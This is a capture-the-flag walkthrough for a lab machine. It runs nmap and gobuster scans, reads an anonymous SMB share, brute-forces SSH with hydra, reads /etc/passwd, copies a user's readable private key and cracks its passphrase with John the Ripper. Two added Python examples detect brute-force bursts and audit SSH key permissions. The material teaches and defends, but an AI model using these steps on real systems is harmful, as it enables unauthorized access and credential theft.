Try Hack Me - Basic Pentesting
This is a machine that allows you to practise web app hacking and privilege escalation
Howdy my fellow Cyber Enthusiasts! Welcome to another room Try Hack Me offers! So let's dive in! You can click on the "Start AttackBox" button for a Linux machine to be available on the right side of your page, so you can follow this walkthrough.
Let's dive in and start with an Nmap scan to our target machine.
$ IP=10.112.130.0
$ sudo nmap -sV -p- $IP
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-11 17:26 +0300
Nmap scan report for 10.112.130.0
Host is up (0.051s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.05 seconds
We are going to use Gobuster for that.
Security professionals and system administrators use it to discover hidden:
- Web directories and files (/admin, /backup.zip)
- Subdomains (dev.example.com)
- Virtual hosts
- Cloud storage buckets
$ gobuster dir -u $IP:80 -w /usr/share/dirb/wordlists/big.txt
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.112.130.0:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
.htpasswd (Status: 403) [Size: 277]
.htaccess (Status: 403) [Size: 277]
[redacted] (Status: 301) [Size: 318] [--> http://10.112.130.0/[redacted]/]
server-status (Status: 403) [Size: 277]
Progress: 20469 / 20469 (100.00%)
===============================================================
Finished
===============================================================
Navigate to the hidden directory using your web browser and see if you can find anything useful.
http://10.112.130.0/[redacted]/
There are two .txt files inside it.


It isn't really helpful. Remember our nmap scan?
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
Let's try to connect using smbclient.
$ smbclient //$IP/anonymous
Password for [WORKGROUP\learn]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Apr 19 20:31:20 2018
.. D 0 Thu Apr 19 20:13:06 2018
staff.txt N 173 Thu Apr 19 20:29:55 2018
14282840 blocks of size 1024. 6256644 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
$ cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, [redacted]!)
-[redacted]
Nice. We have two usernames now. Let's try to brute-force their passwords.
$ hydra -t 16 -l jan -P /usr/share/wordlists/rockyou.txt ssh://$IP
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-11 17:48:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.112.130.0:22/
[STATUS] 218.00 tries/min, 218 tries in 00:01h, 14344185 to do in 1096:40h, 12 active
[STATUS] 205.67 tries/min, 617 tries in 00:03h, 14343786 to do in 1162:23h, 12 active
[22][ssh] host: 10.112.130.0 login: [redacted] password: [redacted]
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-11 17:52:12
We found the credentials using hydra.
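Seen from the server side, the Hydra run above is a burst of failed sshd password attempts from one address, followed by a successful login. The following is an added example, not part of the original walkthrough: it flags that pattern in auth.log-style lines. The sample lines, hostname, addresses and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample (hostname, PIDs, ports and addresses are made up).
SAMPLE = """\
May 11 17:48:31 host1 sshd[2101]: Failed password for jan from 192.0.2.10 port 40112 ssh2
May 11 17:48:33 host1 sshd[2102]: Failed password for jan from 192.0.2.10 port 40114 ssh2
May 11 17:48:34 host1 sshd[2103]: Failed password for invalid user admin from 192.0.2.10 port 40118 ssh2
May 11 17:48:36 host1 sshd[2104]: Failed password for jan from 192.0.2.10 port 40120 ssh2
May 11 17:48:40 host1 sshd[2110]: Failed password for ops from 192.0.2.77 port 51000 ssh2
May 11 17:48:41 host1 sshd[2105]: Failed password for jan from 192.0.2.10 port 40122 ssh2
May 11 17:48:52 host1 sshd[2111]: Accepted password for ops from 192.0.2.77 port 51002 ssh2
May 11 17:51:58 host1 sshd[2190]: Accepted password for jan from 192.0.2.10 port 40990 ssh2
"""

# Matches sshd's syslog lines for failed and accepted password logins.
EVENT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: "
    r"(?P<kind>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def detect(lines, threshold=5, window_s=60, year=2026):
    """Return (bursts, compromised): sources with >= threshold failures inside
    window_s seconds, and (src, user) logins later accepted from such a source.
    Syslog timestamps carry no year, so the caller supplies one."""
    recent = defaultdict(deque)          # src -> timestamps of recent failures
    bursts, compromised = set(), []
    for line in lines:
        m = EVENT.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        src = m["src"]
        if m["kind"] == "Failed":
            q = recent[src]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()              # drop failures older than the window
            if len(q) >= threshold:
                bursts.add(src)          # a flagged source stays flagged
        elif src in bursts:
            compromised.append((src, m["user"]))  # success after a burst
    return bursts, compromised
```

A single mistyped password followed by a success, like the `ops` lines in the sample, stays below the threshold and is not reported.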
Again, the answer lies in our Nmap scan.
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
Let's connect using our SSH credentials.
$ ssh [redacted]@$IP
We can read /etc/passwd to find the other user on the machine.
$ cat /etc/passwd
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
[redacted]:x:1000:1000:[redacted],,,:/home/[redacted]:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
tomcat9:x:999:999::/home/tomcat9:/bin/false
[redacted]:x:1001:1001::/home/[redacted]:/bin/bash
The new user has a home directory under /home. Let's go there and try to find something useful.
[redacted]@ip-10-112-130-0:/home/[redacted]$ ls -la
total 48
drwxr-xr-x 5 [redacted] [redacted] 4096 Apr 23 2018 .
drwxr-xr-x 5 root root 4096 May 11 10:20 ..
-rw------- 1 [redacted] [redacted] 789 Jun 22 2025 .bash_history
-rw-r--r-- 1 [redacted] [redacted] 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 [redacted] [redacted] 3771 Apr 17 2018 .bashrc
drwx------ 2 [redacted] [redacted] 4096 Apr 17 2018 .cache
-rw------- 1 [redacted] [redacted] 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 [redacted] [redacted] 4096 Apr 23 2018 .nano
-rw------- 1 [redacted] [redacted] 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 [redacted] [redacted] 655 Apr 17 2018 .profile
drwxr-xr-x 2 [redacted] [redacted] 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 [redacted] [redacted] 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 [redacted] [redacted] 538 Apr 23 2018 .viminfo
[redacted]@ip-10-112-130-0:/home/[redacted]$ cd .ssh
[redacted]@ip-10-112-130-0:/home/[redacted]/.ssh$ ls -la
total 20
drwxr-xr-x 2 [redacted] [redacted] 4096 Apr 23 2018 .
drwxr-xr-x 5 [redacted] [redacted] 4096 Apr 23 2018 ..
-rw-rw-r-- 1 [redacted] [redacted] 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 [redacted] [redacted] 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 [redacted] [redacted] 771 Apr 19 2018 id_rsa.pub
Great! We have an .ssh folder. Let's grab these files, give them the necessary permissions and try to connect.
id_rsa
id_rsa.pub
$ chmod 600 id_rsa
$ ssh -i id_rsa [redacted]@$IP
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'id_rsa':
We are asked for the key's passphrase. Let's crack it!
$ ssh2john id_rsa > key.hash
ssh2john is a utility script that extracts password hashes from encrypted SSH private keys and converts them into a format that John the Ripper can attempt to crack.
$ john key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
$ john --show key.hash
id_rsa:[redacted]
Great! We now have the passphrase for our user's SSH key. Let's use that to connect to the machine.
$ ssh -i id_rsa [redacted]@$IP
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'id_rsa':
[redacted]@ip-10-112-130-0:~$ pwd
/home/[redacted]
[redacted]@ip-10-112-130-0:~$ ls
pass.bak
[redacted]@ip-10-112-130-0:~$ cat pass.bak
[redacted]
Congratulations! You have solved this room!
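The move to the second account worked because that user's id_rsa was listed as -rw-r--r--, so any local account could copy it, and the authorized_keys file next to it was group-writable. This added example (not from the original walkthrough) audits a directory tree such as /home for both conditions; the function names are illustrative.

```python
import os
import stat

# Added example: helper names are illustrative, not from the walkthrough.
def is_private_key(path):
    """True if the file starts with a PEM/OpenSSH private-key header."""
    try:
        with open(path, "rb") as fh:
            head = fh.readline(128)
    except OSError:
        return False
    return head.startswith(b"-----BEGIN ") and b"PRIVATE KEY-----" in head

def audit_ssh_files(root):
    """Walk root and return sorted (relative_path, mode, finding) tuples for
    private keys readable beyond their owner and for authorized_keys files
    that group or other can write."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue                      # skip symlinks, sockets, etc.
            mode = stat.S_IMODE(st.st_mode)
            rel = os.path.relpath(path, root)
            if name == "authorized_keys" and mode & 0o022:
                findings.append((rel, oct(mode), "writable by group/other"))
            elif mode & 0o044 and is_private_key(path):
                findings.append(
                    (rel, oct(mode), "private key readable by group/other"))
    return sorted(findings)

if __name__ == "__main__":
    # Run as root so every home directory can be read.
    for rel, mode, finding in audit_ssh_files("/home"):
        print(f"{mode}  {rel}: {finding}")
```

Keys are matched by their header rather than by file name, so a copied or renamed key is still reported.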